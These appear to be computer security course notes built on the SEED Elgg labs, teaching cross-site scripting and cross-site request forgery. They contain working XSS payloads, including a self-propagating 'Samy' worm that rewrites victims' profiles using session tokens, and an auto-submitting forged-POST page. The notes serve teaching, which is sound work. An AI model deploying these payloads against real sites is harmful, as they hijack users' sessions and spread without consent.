## <center> Cross-Site Scripting Attack </center>

- Code injection attack

- Second most prevalent issue in the Top Ten web security risks by the Open Web Application Security Project (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_2017_Project)

<center> <img src="figure/xss/xss1.png" width="600"/>

- Codes coming from the website are considered trusted and will be executed within the protected sandbox of the browser. 
- If the victim has an active session with the website, the code can do whatever the user can do inside the session. 

#### Two types of XSS attack
- Persistent XSS
- Non-persistent XSS

#### Non-persistent (reflected) XSS attack

<center> <img src="figure/xss/xss2.png" width="600"/>

#### Examples
- Go to Google and search for "cross-site scriping attack"
- How the search query is reflected back inside the web page?

When a reflect website does not sanitize user inputs, it may have an XSS vulnerability:

- Javascript codes can be put into the input so that the codes can be reflected back in the page displayed in the browser of the victim. 

#### Persistent XSS Attack
<center> <img src="figure/xss/xss3.png" width="600"/>

#### Potential damage from XSS
- Web defacing via DOM API modification
- Spoofing requests
- Stealing information

#### XSS Attacks in Action

- Use SEED Virtual Machine
- www.XSSLabElgg.com
- /var/www/XSS/elgg

- admin/seedelgg
- alice/seedalice
- boby/seedboby
- charlie/seedcharlie
- samy/seedsamy

#### Injecting Javascript Code

- Place the following code inside the **Brief Description** field of Samy's profile:

```
<script> alert("XSS"); </script>
```

- What happens when someone else visits Samy's profile?

#### Use XSS Attacks to Befriend with Others

- Examine Page Source to identify add-friend request string and security token parameters
- In Javascript code, we will use Ajax to send out HTTP requests in background

Enter the followings into Samy's **About me** field (must switch to Edit HTML mode):

```
<script type="text/javascript">
window.onload = function(){
// Set the timestamp and secret token parameters 
var Ajax = null;
var ts    = "&__elgg_ts="+elgg.security.token.__elgg_ts;      
var token = "&__elgg_token="+elgg.security.token.__elgg_token; 

// Construct the URL (Samy's GUID is 47)
var sendurl="http://www.xsslabelgg.com/action/friends/add"     
             + "?friend=47" + token + ts;                      

// Create and send the Ajax request
Ajax=new XMLHttpRequest();
Ajax.open("GET",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
                      "application/x-www-form-urlencoded");
Ajax.send();
}
</script>
```

#### Use XSS Attacks to modify profiles

```
<script type="text/javascript">
window.onload = function(){
// Access user name and guid
var name = "&name=" + elgg.session.user.name;
var guid = "&guid=" + elgg.session.user.guid;

// Access timestamp and security token
var ts    = "&__elgg_ts="+elgg.security.token.__elgg_ts;
var token = "&__elgg_token="+elgg.security.token.__elgg_token;

// Set the content and access leve for the description field
var desc = "&description=SAMY+is+MY+HERO";
desc += "&accesslevel%5Bdescription%5d=2";

// Set the URL
var sendurl="http://www.xsslabelgg.com/action/profile/edit";

// Construct and send the Ajax request
if(elgg.session.user.guid != 47)     
{
   //Create and send Ajax request to modify profile
   var Ajax=new XMLHttpRequest();
   Ajax.open("POST", sendurl, true);
   Ajax.setRequestHeader("Host","www.xsslabelgg.com");
   Ajax.setRequestHeader("Content-Type",
                         "application/x-www-form-urlencoded");

   // Send the POST request with the data
   Ajax.send(token + ts + name + desc + guid);
}
}
</script>
```

#### Achieving self-propagation

<center> <img src="figure/xss/xss4.png" width="600"/>

#### DOM Approach

- Add an identifier to the Javascript so that it is stored and accessible via the page's DOM (Document Object Model). 
- Include with the script a self-calling function that adds script's content from DOM to the victim's profile. 

```
<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\"worm\" type=\"text/javascript\">";  
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";                                  

// Put all the pieces together, and apply the URI encoding 
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);  


// Access user name and guid
var name = "&name=" + elgg.session.user.name;
var guid = "&guid=" + elgg.session.user.guid;

// Access timestamp and security token
var ts    = "&__elgg_ts="+elgg.security.token.__elgg_ts;
var token = "&__elgg_token="+elgg.security.token.__elgg_token;

// Set the content and access leve for the description field
var desc = "&description=SAMY+is+MY+HERO" + wormCode;
desc += "&accesslevel%5Bdescription%5d=2";

// Set the URL
var sendurl="http://www.xsslabelgg.com/action/profile/edit";

// Construct and send the Ajax request
if(elgg.session.user.guid != 47)     
{
   //Create and send Ajax request to modify profile
   var Ajax=new XMLHttpRequest();
   Ajax.open("POST", sendurl, true);
   Ajax.setRequestHeader("Host","www.xsslabelgg.com");
   Ajax.setRequestHeader("Content-Type",
                         "application/x-www-form-urlencoded");

   // Send the POST request with the data
   Ajax.send(token + ts + name + desc + guid);
}
}
</script>
```

### Countermeasures:

- Filter all Javascript codes (difficult to implement)
- Replace HTML markups with alternate representation, encoding and decoding syntax (<, >, ...)

To add Samy to Charlie's friend list, Charlie needs to go to Samy's profile and click on the **Add Friend** button. 

<center> <img src="figure/csrf/charlie_add.png" width="600"/>

In [104]:
charlie_add = s_charlie.get("http://www.csrflabelgg.com/profile/samy")
for item in charlie_add.headers:
    print(item,': ', charlie_add.headers[item])

print(bs4.BeautifulSoup(charlie_add.text, 'html.parser').prettify())

Date :  Mon, 08 Oct 2018 00:32:34 GMT
Server :  Apache/2.4.18 (Ubuntu)
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  2571
Keep-Alive :  timeout=5, max=100
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   Samy : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/profile/samy?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://www.csrfla

The critical GET:
- http://www.csrflabelgg.com/action/friends/add?friend=45&amp;__elgg_ts=1538958754&amp;__elgg_token=z57VH-ptymaDB5XlT5NJHg
- We can ignore everything after the first `&`, as those are disabled countermeasures
- http://www.csrflabelgg.com/action/friends/add?friend=45

In [106]:
# We can test with Charlie's session:

s_charlie.get("http://www.csrflabelgg.com/action/friends/add?friend=45")

charlie_profile = s_charlie.get("http://www.csrflabelgg.com/profile/charlie")
for item in charlie_profile.headers:
    print(item,': ', charlie_profile.headers[item])

print(bs4.BeautifulSoup(charlie_profile.text, 'html.parser').prettify())

Date :  Mon, 08 Oct 2018 00:50:00 GMT
Server :  Apache/2.4.18 (Ubuntu)
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  3563
Keep-Alive :  timeout=5, max=97
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   Charlie : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/profile/charlie?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://www.c

Samy is now in Charlie's friend list.

<center> <img src="figure/csrf/charlie_samy.png" width="600"/>

#### How do we get Alice to invoke this GET request?

- http://www.csrflabelgg.com/action/friends/add?friend=45
- https://linhbngo.github.io/Computer-Security/csrf.html

#### Demo inside SEED's Firefox

- Login to www.csrflabelgg.com as Alice (alice/seedalice)
- Open a new tab and visit https://linhbngo.github.io/Computer-Security/csrf.html
- Switch back to Elgg and visit Alice's profile
- Who's Alice's friend?
- How does that happen?

### CSRF on HTTP POST Request

- POST requires explicit click action from users. 
- The action can be forged through Javascript embedded in malicious website. 
- How is the POST request formed on the website?
- How can you get the users to access the malicious and invoke the malicious Javascript?

In [115]:
s_samy = Session()

samy_payload = {
    'username': 'samy',
    'password': 'seedsamy',
    'persistent': 'true',
}

samy_main = s_samy.post("http://www.csrflabelgg.com/action/login", data = samy_payload)
for item in samy_main.headers:
    print(item,': ', samy_main.headers[item])

print(bs4.BeautifulSoup(samy_main.text, 'html.parser').prettify())

Date :  Mon, 08 Oct 2018 01:24:56 GMT
Server :  Apache/2.4.18 (Ubuntu)
Expires :  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control :  no-store, no-cache, must-revalidate
Pragma :  no-cache
X-Frame-Options :  SAMEORIGIN
Vary :  Accept-Encoding
Content-Encoding :  gzip
Content-Length :  3701
Keep-Alive :  timeout=5, max=98
Connection :  Keep-Alive
Content-Type :  text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   All Site Activity : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/activity?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://ww

In [116]:
samy_edit = s_samy.post("http://www.csrflabelgg.com/profile/samy/edit")
print(bs4.BeautifulSoup(samy_edit.text, 'html.parser').prettify())

<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>
   Edit profile : CSRF Lab Site
  </title>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <meta name="description"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
  <meta content="yes" name="mobile-web-app-capable"/>
  <meta content="yes" name="apple-mobile-web-app-capable"/>
  <link href="http://www.csrflabelgg.com/profile/samy/edit?view=rss" rel="alternative" title="RSS" type="application/rss+xml"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/aalborg_theme/homescreen.png" rel="apple-touch-icon"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/favicon.ico" rel="icon"/>
  <link href="http://www.csrflabelgg.com/cache/1501099611/default/favicon.svg" rel="icon" sizes="16x16 32x32 48x48 64x64 128x128" type="image/svg+xml"/>
  <link href="http://www.csrflabelgg.

In [118]:
samy_test = s_samy.get('https://linhbngo.github.io/Computer-Security/csrf_post.html')
print(bs4.BeautifulSoup(samy_test.text, 'html.parser').prettify())

<html>
 <body>
  <h1>
   This page forges an HTTP POST request.
  </h1>
  <script type="text/javascript">
   function forge_post()
{
  var fields;

  fields = "<input type='hidden' name='name' value='Samy'>";
  fields += "<input type='hidden' name='description' value='SAMY is MY HERO'>";
  fields += "<input type='hidden' name='accesslevel[description]' value='2'>";
  fields += "<input type='hidden' name='guid' value='45'>";

  var p = document.createElement("form");  
  p.action = "http://www.csrflabelgg.com/action/profile/edit";
  p.innerHTML = fields;
  p.method = "post";  
  document.body.appendChild(p); 
  p.submit();
}

window.onload = function() { forge_post();}
  </script>
 </body>
</html>



**Exercise: **

- Done via Firefox inside SEED's virtualbox.
- Login to www.csrflabelgg.com as Samy. 
- In a new tab, visit https://linhbngo.github.io/Computer-Security/csrf_post.html
- What happens?
- How can you substitute Samy's GUID with  Alice's GUID for the malicious site?